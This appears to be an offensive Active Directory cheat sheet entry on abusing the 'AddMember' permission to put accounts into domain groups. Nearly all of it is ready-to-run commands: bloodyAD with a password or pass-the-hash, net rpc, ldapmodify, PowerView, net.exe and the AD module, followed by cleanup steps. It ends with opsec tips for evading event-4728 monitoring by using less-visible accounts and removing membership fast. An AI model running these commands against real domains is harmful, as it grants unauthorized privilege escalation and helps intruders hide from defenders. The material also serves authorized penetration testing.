AddMember
Source can add any principal to the target group
Applies to: User/Group/Computer β Group
Linux Abuse
bloodyAD β add user to group
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
bloodyAD β add with hash
bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<username>'
bloodyAD β add arbitrary user to group
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
add groupMember '<target-group>' '<target-user>'
net rpc (impacket)
net rpc group addmem '<target-group>' '<username>' -U <domain>/<username>%'<password>' -S <dc-ip>
ldapmodify
ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: member
member: CN=<username>,CN=Users,DC=<domain>,DC=<tld>
EOF
Windows Abuse
PowerView
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Verify membership
Get-DomainGroupMember -Identity '<target-group>' -Recurse | Where-Object {$_.MemberName -eq '<username>'}
CMD / net.exe
net group "<target-group>" <username> /add /domain
AD Module
Add-ADGroupMember -Identity '<target-group>' -Members '<username>'
Cleanup
Remove-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
Opsec
- Group membership changes generate event 4728 (security group member added) on the DC β monitored on privileged groups (Domain Admins, etc.)
- Prefer adding a less-visible user or computer account; if adding self, move fast and remove after use